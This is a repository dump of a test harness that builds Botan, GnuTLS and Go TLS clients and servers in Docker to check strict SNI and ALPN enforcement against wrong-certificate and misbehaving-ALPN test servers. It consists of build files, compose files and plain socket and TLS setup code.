14 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 15 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 16 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 17 | ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE 18 | LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 19 | CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF 20 | SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 21 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN 22 | CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 23 | ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 24 | POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- /evaluation-libraries/botan/README.md: -------------------------------------------------------------------------------- 1 | # botan example with strict sni and strict alpn 2 | 3 | Tested with botan 2.17.3 4 | 5 | needs tls-baseimage already in docker 6 | 7 | Based on https://github.com/randombit/botan tls_client.cpp and tls_server.cpp 8 | 9 | ```bash 10 | ./run.sh 11 | ``` 12 | 13 | 14 | -------------------------------------------------------------------------------- /evaluation-libraries/botan/build.sh: -------------------------------------------------------------------------------- 1 | docker build . 
-t tls-botan -------------------------------------------------------------------------------- /evaluation-libraries/botan/client/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(alpaca-botan-client VERSION 0.1.0) 3 | 4 | find_package(Botan2 REQUIRED) 5 | include_directories(SYSTEM ${BOTAN2_INCLUDE_DIR}) 6 | 7 | add_executable(client client.cpp) 8 | target_link_libraries(client pthread ${BOTAN2_LIBRARIES}) 9 | target_compile_options(client PRIVATE -Wall -Wextra) -------------------------------------------------------------------------------- /evaluation-libraries/botan/cmake/FindBotan2.cmake: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2018-2020 Ribose Inc. 2 | # All rights reserved. 3 | # 4 | # Redistribution and use in source and binary forms, with or without 5 | # modification, are permitted provided that the following conditions 6 | # are met: 7 | # 1. Redistributions of source code must retain the above copyright 8 | # notice, this list of conditions and the following disclaimer. 9 | # 2. Redistributions in binary form must reproduce the above copyright 10 | # notice, this list of conditions and the following disclaimer in the 11 | # documentation and/or other materials provided with the distribution. 12 | # 13 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 14 | # ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED 15 | # TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 16 | # PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDERS OR CONTRIBUTORS 17 | # BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 18 | # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF 19 | # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 20 | # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN 21 | # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 22 | # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 23 | # POSSIBILITY OF SUCH DAMAGE. 24 | 25 | #.rst: 26 | # FindBotan2 27 | # ----------- 28 | # 29 | # Find the botan-2 library. 30 | # 31 | # IMPORTED Targets 32 | # ^^^^^^^^^^^^^^^^ 33 | # 34 | # This module defines :prop_tgt:`IMPORTED` targets: 35 | # 36 | # ``Botan2::Botan2`` 37 | # The botan-2 library, if found. 38 | # 39 | # Result variables 40 | # ^^^^^^^^^^^^^^^^ 41 | # 42 | # This module defines the following variables: 43 | # 44 | # :: 45 | # 46 | # BOTAN2_FOUND - true if the headers and library were found 47 | # BOTAN2_INCLUDE_DIRS - where to find headers 48 | # BOTAN2_LIBRARIES - list of libraries to link 49 | # BOTAN2_VERSION - library version that was found, if any 50 | 51 | # use pkg-config to get the directories and then use these values 52 | # in the find_path() and find_library() calls 53 | find_package(PkgConfig QUIET) 54 | pkg_check_modules(PC_BOTAN2 QUIET botan-2) 55 | 56 | # find the headers 57 | find_path(BOTAN2_INCLUDE_DIR 58 | NAMES botan/version.h 59 | HINTS 60 | ${PC_BOTAN2_INCLUDEDIR} 61 | ${PC_BOTAN2_INCLUDE_DIRS} 62 | PATH_SUFFIXES botan-2 63 | ) 64 | 65 | # find the library 66 | if(MSVC) 67 | find_library(BOTAN2_LIBRARY 68 | NAMES botan 69 | HINTS 70 | ${PC_BOTAN2_LIBDIR} 71 | ${PC_BOTAN2_LIBRARY_DIRS} 72 | ) 73 | else() 74 | find_library(BOTAN2_LIBRARY 75 | NAMES botan-2 libbotan-2 76 | HINTS 77 | ${PC_BOTAN2_LIBDIR} 78 | ${PC_BOTAN2_LIBRARY_DIRS} 79 | ) 80 | endif() 81 | 82 | # determine the version 83 | 
if(PC_BOTAN2_VERSION) 84 | set(BOTAN2_VERSION ${PC_BOTAN2_VERSION}) 85 | elseif(BOTAN2_INCLUDE_DIR AND EXISTS "${BOTAN2_INCLUDE_DIR}/botan/build.h") 86 | file(STRINGS "${BOTAN2_INCLUDE_DIR}/botan/build.h" botan2_version_str 87 | REGEX "^#define[\t ]+(BOTAN_VERSION_[A-Z]+)[\t ]+[0-9]+") 88 | 89 | string(REGEX REPLACE ".*#define[\t ]+BOTAN_VERSION_MAJOR[\t ]+([0-9]+).*" 90 | "\\1" _botan2_version_major "${botan2_version_str}") 91 | string(REGEX REPLACE ".*#define[\t ]+BOTAN_VERSION_MINOR[\t ]+([0-9]+).*" 92 | "\\1" _botan2_version_minor "${botan2_version_str}") 93 | string(REGEX REPLACE ".*#define[\t ]+BOTAN_VERSION_PATCH[\t ]+([0-9]+).*" 94 | "\\1" _botan2_version_patch "${botan2_version_str}") 95 | set(BOTAN2_VERSION "${_botan2_version_major}.${_botan2_version_minor}.${_botan2_version_patch}" 96 | CACHE INTERNAL "The version of Botan which was detected") 97 | endif() 98 | 99 | include(FindPackageHandleStandardArgs) 100 | find_package_handle_standard_args(Botan2 101 | REQUIRED_VARS BOTAN2_LIBRARY BOTAN2_INCLUDE_DIR 102 | VERSION_VAR BOTAN2_VERSION 103 | ) 104 | 105 | if (BOTAN2_FOUND) 106 | set(BOTAN2_INCLUDE_DIRS ${BOTAN2_INCLUDE_DIR} ${PC_BOTAN2_INCLUDE_DIRS}) 107 | set(BOTAN2_LIBRARIES ${BOTAN2_LIBRARY}) 108 | endif() 109 | 110 | if (BOTAN2_FOUND AND NOT TARGET Botan2::Botan2) 111 | # create the new library target 112 | add_library(Botan2::Botan2 UNKNOWN IMPORTED) 113 | # set the required include dirs for the target 114 | if (BOTAN2_INCLUDE_DIRS) 115 | set_target_properties(Botan2::Botan2 116 | PROPERTIES 117 | INTERFACE_INCLUDE_DIRECTORIES "${BOTAN2_INCLUDE_DIRS}" 118 | ) 119 | endif() 120 | # set the required libraries for the target 121 | if (EXISTS "${BOTAN2_LIBRARY}") 122 | set_target_properties(Botan2::Botan2 123 | PROPERTIES 124 | IMPORTED_LINK_INTERFACE_LANGUAGES "C" 125 | IMPORTED_LOCATION "${BOTAN2_LIBRARY}" 126 | ) 127 | endif() 128 | endif() 129 | 130 | mark_as_advanced(BOTAN2_INCLUDE_DIR BOTAN2_LIBRARY) 
-------------------------------------------------------------------------------- /evaluation-libraries/botan/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | botan-server: 8 | image: tls-botan 9 | openssl-server-wrong-cn: 10 | image: tls-openssl 11 | command: [ "/openssl-server", "-k", "/etc/ssl/cert-data/wrong-cn.com.key", "-c" , "/etc/ssl/cert-data/wrong-cn.com-chain.crt"] 12 | openssl-malicious-alpn: 13 | image: tls-openssl 14 | command: [ "/openssl-server", "-m"] 15 | botan-client: 16 | image: tls-botan 17 | command: [ "/client.sh", "/client", "botan-server", "openssl-server-wrong-cn", "openssl-malicious-alpn" ,"1"] 18 | depends_on: 19 | - botan-server 20 | - openssl-server-wrong-cn 21 | - openssl-malicious-alpn -------------------------------------------------------------------------------- /evaluation-libraries/botan/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --abort-on-container-exit --exit-code-from botan-client --remove-orphans -------------------------------------------------------------------------------- /evaluation-libraries/botan/server/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(alpaca-botan-server VERSION 0.1.0) 3 | 4 | find_package(Botan2 REQUIRED) 5 | include_directories(SYSTEM ${BOTAN2_INCLUDE_DIR}) 6 | 7 | add_executable(server server.cpp) 8 | target_link_libraries(server pthread ${BOTAN2_LIBRARIES}) 9 | target_compile_options(server PRIVATE -Wall -Wextra) -------------------------------------------------------------------------------- /evaluation-libraries/botan/server/server.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 
#include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | 26 | #include 27 | #include 28 | 29 | typedef int socket_type; 30 | typedef size_t sendrecv_len_type; 31 | 32 | socket_type make_server_socket(uint16_t port) { 33 | socket_type fd = ::socket(PF_INET, SOCK_STREAM, 0); 34 | if (fd == -1) { 35 | std::cerr << "Unable to acquire socket" << std::endl; 36 | } 37 | 38 | sockaddr_in socket_info; 39 | Botan::clear_mem(&socket_info, 1); 40 | socket_info.sin_family = AF_INET; 41 | socket_info.sin_port = htons(port); 42 | 43 | // FIXME: support limiting listeners 44 | socket_info.sin_addr.s_addr = INADDR_ANY; 45 | 46 | if (::bind(fd, reinterpret_cast(&socket_info), sizeof(struct sockaddr)) != 0) { 47 | ::close(fd); 48 | std::cerr << "server bind failed" << std::endl; 49 | } 50 | 51 | if (::listen(fd, 100) != 0) { 52 | ::close(fd); 53 | std::cerr << "listen failed" << std::endl; 54 | } 55 | return fd; 56 | } 57 | 58 | /* class Basic_TLS_Policy final : public Botan::TLS::Policy 59 | { 60 | public: 61 | bool require_cert_revocation_info() const override 62 | { 63 | return false; 64 | } 65 | std::vector allowed_ciphers() const override 66 | { 67 | return {"ChaCha20Poly1305", "AES-256/GCM", "AES-128/GCM"}; 68 | } 69 | std::vector allowed_signature_hashes() const override 70 | { 71 | return {"SHA-512", "SHA-384"}; 72 | } 73 | std::vector allowed_macs() const override 74 | { 75 | return {"AEAD"}; 76 | } 77 | std::vector allowed_key_exchange_methods() const override 78 | { 79 | return {"CECPQ1", "ECDH"}; 80 | } 81 | bool allow_tls10() const override { return false; } 82 | bool allow_tls11() const override { return false; } 83 | bool allow_tls12() const override { return true; } 84 | }; */ 85 | 
-------------------------------------------------------------------------------- /evaluation-libraries/build-everything.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | for library in baseimage openssl bearssl botan java gnutls golang mbedtls wolfssl rustls; do 3 | (cd "$library" 4 | ./build.sh); 5 | done 6 | -------------------------------------------------------------------------------- /evaluation-libraries/gnutls/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(alpaca-gnutls VERSION 0.1.0) 3 | 4 | 5 | set(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} ${CMAKE_CURRENT_SOURCE_DIR}/cmake) 6 | include(CMakeToolsHelpers OPTIONAL) 7 | include(FeatureSummary) 8 | 9 | include(CheckCCompilerFlag) 10 | include(CheckCXXCompilerFlag) 11 | include(CheckCXXSourceCompiles) 12 | 13 | 14 | 15 | add_subdirectory(client) 16 | add_subdirectory(server) 17 | -------------------------------------------------------------------------------- /evaluation-libraries/gnutls/Dockerfile: -------------------------------------------------------------------------------- 1 | # syntax=docker/dockerfile:1 2 | FROM tls-baseimage as tls-gnutls 3 | ARG VERSION=3.7.2 4 | # RUN git clone --depth=1 -b ${VERSION} https://gitlab.com/gnutls/gnutls.git 5 | # RUN apk add guile-dev 6 | # ENV PKG_CONFIG_PATH=/build/lib/pkgconfig/ 7 | # # RUN apk add flex gmp-dev libunistring-dev libffi-dev gc-dev 8 | # # RUN git clone https://github.com/cky/guile.git 9 | # # WORKDIR /src/guile 10 | # # RUN ./autogen.sh 11 | # # RUN ./configure 12 | # # RUN make 13 | 14 | # RUN wget https://ftp.gnu.org/gnu/autogen/rel5.18.12/autogen-5.18.12.tar.gz 15 | # RUN tar -xzf autogen-5.18.12.tar.gz 16 | # WORKDIR /src/autogen-5.18.12/ 17 | # RUN ./configure 18 | # RUN make && make install 19 | 20 | # WORKDIR /src/gnutls 21 | # RUN git submodule update --init --no-fetch 22 | # RUN 
./bootstrap 23 | # RUN ./configure --with-included-libtasn1 --with-included-unistring --disable-maintainer-mode --disable-doc --disable-full-test-suite --disable-cxx --disable-padlock --without-p11-kit --without-tpm 24 | # RUN make 25 | 26 | RUN apk add --no-cache gnutls-dev 27 | 28 | ADD cmake /build/cmake 29 | ADD server /build/server 30 | ADD client /build/client 31 | ADD CMakeLists.txt /build/CMakeLists.txt 32 | WORKDIR /build 33 | RUN cmake . .. && make 34 | RUN mv /build/server/server / 35 | RUN mv /build/client/client / 36 | COPY --from=tls-openssl /openssl-client /openssl-client 37 | WORKDIR / 38 | CMD ["/server"] 39 | -------------------------------------------------------------------------------- /evaluation-libraries/gnutls/LICENSE: -------------------------------------------------------------------------------- 1 | LICENSING 2 | ========= 3 | 4 | Since GnuTLS version 3.1.10, the core library is released under 5 | the GNU Lesser General Public License (LGPL) version 2.1 or later 6 | (see doc/COPYING.LESSER for the license terms). 7 | 8 | The GNU LGPL applies to the main GnuTLS library, while the 9 | included applications as well as gnutls-openssl 10 | library are under the GNU GPL version 3. The gnutls library is 11 | located in the lib/ and libdane/ directories, while the applications 12 | in src/ and, the gnutls-openssl library is at extra/. 13 | 14 | The documentation in doc/ is under the GNU FDL license 1.3. 15 | 16 | 17 | Note, however, that the nettle and the gmp libraries which are 18 | GnuTLS dependencies, they are distributed under a LGPLv3+ or GPLv2+ dual 19 | license. As such binaries linking to them need to adhere to either LGPLv3+ 20 | or the GPLv2+ license. 21 | 22 | For any copyright year range specified as YYYY-ZZZZ in this package 23 | note that the range specifies every single year in that closed interval. 
-------------------------------------------------------------------------------- /evaluation-libraries/gnutls/build.sh: -------------------------------------------------------------------------------- 1 | docker build . -t tls-gnutls 2 | -------------------------------------------------------------------------------- /evaluation-libraries/gnutls/client/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(alpaca-gnutls-client VERSION 0.1.0) 3 | 4 | find_package(GnuTLS REQUIRED) 5 | include_directories(SYSTEM ${GNUTLS_INCLUDE_DIR}) 6 | 7 | add_executable(client client.c) 8 | target_link_libraries(client ${GNUTLS_LIBRARIES}) 9 | target_compile_options(client PRIVATE -Wall -Wextra) -------------------------------------------------------------------------------- /evaluation-libraries/gnutls/client/examples.h: -------------------------------------------------------------------------------- 1 | /* This example code is placed in the public domain. 
*/ 2 | // gnutls/gnutls/doc/examples 3 | 4 | #ifndef EXAMPLES_H 5 | #define EXAMPLES_H 6 | 7 | void check_alert(gnutls_session_t session, int ret); 8 | 9 | int write_pkcs12(const gnutls_datum_t *cert, 10 | const gnutls_datum_t *pkcs8_key, const char *password); 11 | 12 | void verify_certificate(gnutls_session_t session, const char *hostname); 13 | 14 | int print_info(gnutls_session_t session); 15 | 16 | void print_x509_certificate_info(gnutls_session_t session); 17 | 18 | int _ssh_verify_certificate_callback(gnutls_session_t session); 19 | 20 | void verify_certificate_chain(const char *hostname, 21 | const gnutls_datum_t *cert_chain, 22 | int cert_chain_length); 23 | 24 | int verify_certificate_callback(gnutls_session_t session); 25 | 26 | #endif /* EXAMPLES_H */ 27 | -------------------------------------------------------------------------------- /evaluation-libraries/gnutls/client/tcp.c: -------------------------------------------------------------------------------- 1 | /* This example code is placed in the public domain. */ 2 | // gnutls/gnutls/doc/examples 3 | 4 | #ifdef HAVE_CONFIG_H 5 | #include 6 | #endif 7 | 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | 18 | /* tcp.c */ 19 | void tcp_close(int sd); 20 | 21 | /* Connects to the peer and returns a socket 22 | * descriptor. 
23 | */ 24 | int tcp_connect(const char *hostname, const char *port) { 25 | int sockfd, portno; 26 | struct sockaddr_in serv_addr; 27 | struct hostent *server; 28 | portno = atoi(port); 29 | sockfd = socket(AF_INET, SOCK_STREAM, 0); 30 | if (sockfd < 0) 31 | printf("ERROR opening socket"); 32 | server = gethostbyname(hostname); 33 | if (server == NULL) { 34 | fprintf(stderr, "ERROR, no such host\n"); 35 | exit(0); 36 | } 37 | bzero((char *)&serv_addr, sizeof(serv_addr)); 38 | serv_addr.sin_family = AF_INET; 39 | bcopy((char *)server->h_addr, 40 | (char *)&serv_addr.sin_addr.s_addr, 41 | server->h_length); 42 | serv_addr.sin_port = htons(portno); 43 | int err = connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)); 44 | if (err < 0) { 45 | fprintf(stderr, "Connect error\n"); 46 | exit(1); 47 | } 48 | return sockfd; 49 | /*int err, sd; 50 | struct sockaddr_in sa; 51 | 52 | struct hostent *host = gethostbyname(hostname); 53 | if (!host) 54 | { 55 | printf("unable to resolve : %s\n", hostname); 56 | return false; 57 | } 58 | 59 | //printf("%s", host->h_addr_list[0]); 60 | 61 | sd = socket(AF_INET, SOCK_STREAM, 0); 62 | 63 | memset(&sa, '\0', sizeof(sa)); 64 | sa.sin_family = AF_INET; 65 | sa.sin_port = htons(atoi(port)); 66 | inet_pton(AF_INET, host->h_addr_list[0], &sa.sin_addr); 67 | 68 | err = connect(sd, (struct sockaddr *) &sa, sizeof(sa)); 69 | if (err < 0) { 70 | fprintf(stderr, "Connect error\n"); 71 | exit(1); 72 | } 73 | 74 | return sd;*/ 75 | } 76 | 77 | /* closes the given socket descriptor. 78 | */ 79 | extern void tcp_close(int sd) { 80 | shutdown(sd, SHUT_RDWR); /* no more receptions */ 81 | close(sd); 82 | } 83 | -------------------------------------------------------------------------------- /evaluation-libraries/gnutls/cmake/FindGnuTLS.cmake: -------------------------------------------------------------------------------- 1 | # Distributed under the OSI-approved BSD 3-Clause License. 
See accompanying 2 | # file Copyright.txt or https://cmake.org/licensing for details. 3 | 4 | #[=======================================================================[.rst: 5 | FindGnuTLS 6 | ---------- 7 | 8 | Find the GNU Transport Layer Security library (gnutls) 9 | 10 | IMPORTED Targets 11 | ^^^^^^^^^^^^^^^^ 12 | 13 | .. versionadded:: 3.16 14 | 15 | This module defines :prop_tgt:`IMPORTED` target ``GnuTLS::GnuTLS``, if 16 | gnutls has been found. 17 | 18 | Result Variables 19 | ^^^^^^^^^^^^^^^^ 20 | 21 | ``GNUTLS_FOUND`` 22 | System has gnutls 23 | ``GNUTLS_INCLUDE_DIR`` 24 | The gnutls include directory 25 | ``GNUTLS_LIBRARIES`` 26 | The libraries needed to use gnutls 27 | ``GNUTLS_DEFINITIONS`` 28 | Compiler switches required for using gnutls 29 | ``GNUTLS_VERSION`` 30 | version of gnutls. 31 | #]=======================================================================] 32 | 33 | # Note that this doesn't try to find the gnutls-extra package. 34 | 35 | 36 | if (GNUTLS_INCLUDE_DIR AND GNUTLS_LIBRARY) 37 | # in cache already 38 | set(gnutls_FIND_QUIETLY TRUE) 39 | endif () 40 | 41 | if (NOT WIN32) 42 | # try using pkg-config to get the directories and then use these values 43 | # in the find_path() and find_library() calls 44 | # also fills in GNUTLS_DEFINITIONS, although that isn't normally useful 45 | find_package(PkgConfig QUIET) 46 | PKG_CHECK_MODULES(PC_GNUTLS QUIET gnutls) 47 | set(GNUTLS_DEFINITIONS ${PC_GNUTLS_CFLAGS_OTHER}) 48 | set(GNUTLS_VERSION ${PC_GNUTLS_VERSION}) 49 | # keep for backward compatibility 50 | set(GNUTLS_VERSION_STRING ${PC_GNUTLS_VERSION}) 51 | endif () 52 | 53 | find_path(GNUTLS_INCLUDE_DIR gnutls/gnutls.h 54 | HINTS 55 | ${PC_GNUTLS_INCLUDEDIR} 56 | ${PC_GNUTLS_INCLUDE_DIRS} 57 | ) 58 | 59 | find_library(GNUTLS_LIBRARY NAMES gnutls libgnutls 60 | HINTS 61 | ${PC_GNUTLS_LIBDIR} 62 | ${PC_GNUTLS_LIBRARY_DIRS} 63 | ) 64 | 65 | mark_as_advanced(GNUTLS_INCLUDE_DIR GNUTLS_LIBRARY) 66 | 67 | 
include(${CMAKE_CURRENT_LIST_DIR}/FindPackageHandleStandardArgs.cmake) 68 | FIND_PACKAGE_HANDLE_STANDARD_ARGS(GnuTLS 69 | REQUIRED_VARS GNUTLS_LIBRARY GNUTLS_INCLUDE_DIR 70 | VERSION_VAR GNUTLS_VERSION_STRING) 71 | 72 | if(GNUTLS_FOUND) 73 | set(GNUTLS_LIBRARIES ${GNUTLS_LIBRARY}) 74 | set(GNUTLS_INCLUDE_DIRS ${GNUTLS_INCLUDE_DIR}) 75 | 76 | if(NOT TARGET GnuTLS::GnuTLS) 77 | add_library(GnuTLS::GnuTLS UNKNOWN IMPORTED) 78 | set_target_properties(GnuTLS::GnuTLS PROPERTIES 79 | INTERFACE_INCLUDE_DIRECTORIES "${GNUTLS_INCLUDE_DIRS}" 80 | INTERFACE_COMPILE_DEFINITIONS "${GNUTLS_DEFINITIONS}" 81 | IMPORTED_LINK_INTERFACE_LANGUAGES "C" 82 | IMPORTED_LOCATION "${GNUTLS_LIBRARIES}") 83 | endif() 84 | endif() -------------------------------------------------------------------------------- /evaluation-libraries/gnutls/cmake/FindPackageMessage.cmake: -------------------------------------------------------------------------------- 1 | # Distributed under the OSI-approved BSD 3-Clause License. See accompanying 2 | # file Copyright.txt or https://cmake.org/licensing for details. 3 | 4 | #[=======================================================================[.rst: 5 | FindPackageMessage 6 | ------------------ 7 | 8 | .. code-block:: cmake 9 | 10 | find_package_message( "message for user" "find result details") 11 | 12 | This function is intended to be used in FindXXX.cmake modules files. 13 | It will print a message once for each unique find result. This is 14 | useful for telling the user where a package was found. The first 15 | argument specifies the name (XXX) of the package. The second argument 16 | specifies the message to display. The third argument lists details 17 | about the find result so that if they change the message will be 18 | displayed again. The macro also obeys the QUIET argument to the 19 | find_package command. 20 | 21 | Example: 22 | 23 | .. 
code-block:: cmake 24 | 25 | if(X11_FOUND) 26 | find_package_message(X11 "Found X11: ${X11_X11_LIB}" 27 | "[${X11_X11_LIB}][${X11_INCLUDE_DIR}]") 28 | else() 29 | ... 30 | endif() 31 | #]=======================================================================] 32 | 33 | function(find_package_message pkg msg details) 34 | # Avoid printing a message repeatedly for the same find result. 35 | if(NOT ${pkg}_FIND_QUIETLY) 36 | string(REPLACE "\n" "" details "${details}") 37 | set(DETAILS_VAR FIND_PACKAGE_MESSAGE_DETAILS_${pkg}) 38 | if(NOT "${details}" STREQUAL "${${DETAILS_VAR}}") 39 | # The message has not yet been printed. 40 | message(STATUS "${msg}") 41 | 42 | # Save the find details in the cache to avoid printing the same 43 | # message again. 44 | set("${DETAILS_VAR}" "${details}" 45 | CACHE INTERNAL "Details about finding ${pkg}") 46 | endif() 47 | endif() 48 | endfunction() -------------------------------------------------------------------------------- /evaluation-libraries/gnutls/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | gnutls-server: 8 | image: tls-gnutls 9 | openssl-server-wrong-cn: 10 | image: tls-openssl 11 | command: [ "/openssl-server", "-k", "/etc/ssl/cert-data/wrong-cn.com.key", "-c" , "/etc/ssl/cert-data/wrong-cn.com-chain.crt"] 12 | openssl-malicious-alpn: 13 | image: tls-openssl 14 | command: [ "/openssl-server", "-m"] 15 | gnutls-client: 16 | image: tls-gnutls 17 | command: [ "./client.sh", "/client", "gnutls-server", "openssl-server-wrong-cn", "openssl-malicious-alpn" ,"1"] 18 | depends_on: 19 | - gnutls-server 20 | - openssl-server-wrong-cn 21 | - openssl-malicious-alpn -------------------------------------------------------------------------------- /evaluation-libraries/gnutls/readme.md: -------------------------------------------------------------------------------- 1 | # gnuttls 
example with strict sni and strict alpn 2 | 3 | Tested with GnuTLS 3.7.1 4 | 5 | needs tls-baseimage already in docker 6 | 7 | based on https://gitlab.com/gnutls/gnutls/-/tree/3.7.1/doc/examples 8 | 9 | ```bash 10 | ./run.sh 11 | ``` -------------------------------------------------------------------------------- /evaluation-libraries/gnutls/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --abort-on-container-exit --exit-code-from gnutls-client --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-libraries/gnutls/server/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(alpaca-gnutls-server VERSION 0.1.0) 3 | 4 | find_package(GnuTLS REQUIRED) 5 | include_directories(SYSTEM ${GNUTLS_INCLUDE_DIR}) 6 | 7 | add_executable(server server.c) 8 | target_link_libraries(server ${GNUTLS_LIBRARIES}) 9 | target_compile_options(server PRIVATE -Wall -Wextra) -------------------------------------------------------------------------------- /evaluation-libraries/gnutls/server/server.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | 13 | #define CHECK(x) assert((x) >= 0) 14 | #define LOOP_CHECK(rval, cmd) \ 15 | do { \ 16 | rval = cmd; \ 17 | } while (rval == GNUTLS_E_AGAIN || rval == GNUTLS_E_INTERRUPTED) 18 | 19 | #define MAX_BUF 1024 20 | 21 | int create_socket(u_int16_t port) { 22 | int listen_sd; 23 | struct sockaddr_in sa_serv; 24 | int optval = 1; 25 | /* Socket operations 26 | */ 27 | listen_sd = socket(AF_INET, SOCK_STREAM, 0); 28 | 29 | memset(&sa_serv, '\0', sizeof(sa_serv)); 30 | sa_serv.sin_family = AF_INET; 31 | sa_serv.sin_addr.s_addr = INADDR_ANY; 32 | 
sa_serv.sin_port = htons(port); 33 | 34 | setsockopt(listen_sd, SOL_SOCKET, SO_REUSEADDR, (void *)&optval, sizeof(int)); 35 | 36 | bind(listen_sd, (struct sockaddr *)&sa_serv, sizeof(sa_serv)); 37 | 38 | return listen_sd; 39 | 40 | printf("Server ready. Listening to port '%d'.\n\n", port); 41 | } -------------------------------------------------------------------------------- /evaluation-libraries/golang/Dockerfile: -------------------------------------------------------------------------------- 1 | # syntax=docker/dockerfile:1 2 | FROM tls-baseimage 3 | WORKDIR . 4 | ADD server /build/server 5 | ADD client /build/client 6 | WORKDIR /build/server 7 | RUN go build server.go 8 | RUN mv server / 9 | WORKDIR /build/client 10 | RUN go build client.go 11 | RUN mv client / 12 | WORKDIR / 13 | COPY --from=tls-openssl /openssl-client /openssl-client 14 | CMD ["/server"] 15 | -------------------------------------------------------------------------------- /evaluation-libraries/golang/README.md: -------------------------------------------------------------------------------- 1 | # Golang TLS example with strict SNI and strict ALPN 2 | 3 | Tested with golang 1.16.7 4 | 5 | Based on https://github.com/denji/golang-tls 6 | 7 | Requires the tls-baseimage image to already be built in Docker. 8 | 9 | 10 | ```bash 11 | ./run.sh 12 | ``` -------------------------------------------------------------------------------- /evaluation-libraries/golang/build.sh: -------------------------------------------------------------------------------- 1 | docker build -t tls-golang . 
-------------------------------------------------------------------------------- /evaluation-libraries/golang/client/client.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "crypto/tls" 5 | "crypto/x509" 6 | "errors" 7 | "flag" 8 | "io/ioutil" 9 | "log" 10 | "os" 11 | "runtime" 12 | "strings" 13 | ) 14 | 15 | var servername string 16 | var certificate string 17 | var host string = "127.0.0.1" 18 | var port string = "4433" 19 | var alpn = []string{""} 20 | 21 | func main() { 22 | log.SetFlags(log.LstdFlags) 23 | 24 | // Get commandline arguments 25 | flag.StringVar(&servername, "s", "tls-server.com", "servername for SNI") 26 | flag.StringVar(&alpn[0], "a", "http/1.1", "ALPN") 27 | flag.StringVar(&certificate, "c", "/etc/ssl/certs/ca.crt", "certicate") 28 | flag.StringVar(&host, "h", "127.0.0.1", "host") 29 | flag.StringVar(&port, "p", "4433", "port") 30 | flag.Parse() 31 | println("Parameters servername=" + servername + " alpn=" + alpn[0] + " cert=" + certificate + " host=" + host + " port=" + port) 32 | 33 | certs := x509.NewCertPool() 34 | 35 | // Read Certificate 36 | pemData, err := ioutil.ReadFile(certificate) 37 | if err != nil { 38 | log.Println(err) 39 | os.Exit(-1) 40 | } 41 | certs.AppendCertsFromPEM(pemData) 42 | 43 | // Setup TLS config 44 | conf := &tls.Config{ 45 | RootCAs: certs, 46 | NextProtos: alpn, 47 | ServerName: servername, 48 | } 49 | if runtime.Version() < "go1.17" { 50 | println("Strict ALPN not implemented in go version. 
